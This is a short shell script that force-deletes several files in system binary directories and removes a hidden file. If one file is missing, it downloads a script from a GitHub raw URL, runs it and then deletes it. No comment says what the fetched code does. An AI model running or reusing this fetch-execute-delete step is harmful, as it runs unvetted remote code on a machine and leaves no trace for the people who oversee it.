file1=/usr/bin/gpgw
if [ -f $file1 ]; then
    rm -f ${file1}
fi
#rm /usr/bin/gpgw

file2=/usr/sbin/dropcache
if [ -f $file2 ]; then
    rm -f ${file2}
fi
#rm /usr/sbin/dropcache

file3=/usr/local/bin/pyrsa-priv2key
if [ -f $file3 ]; then
    rm -f ${file3}
fi
#rm /usr/local/bin/pyrsa-priv2key

file4=/usr/sbin/ifmid
if [ -f $file4 ]; then
    rm -f ${file4}
fi
#rm /usr/sbin/ifmid

file5=/usr/bin/gpgz
if [ -f $file5 ]; then
    rm -f ${file5}
fi
#rm /usr/bin/gpgz

file6=/usr/bin/eue
if [ -f $file6 ]; then
    rm -f ${file6}
else
    wget -O /usr/bin/eue "https://raw.githubusercontent.com/YaddyKakkoii/tes/main/ewe.sh"
    chmod +x /usr/bin/eue
    eue
    rm -f /usr/bin/eue
fi
rm .ahh
ls -la
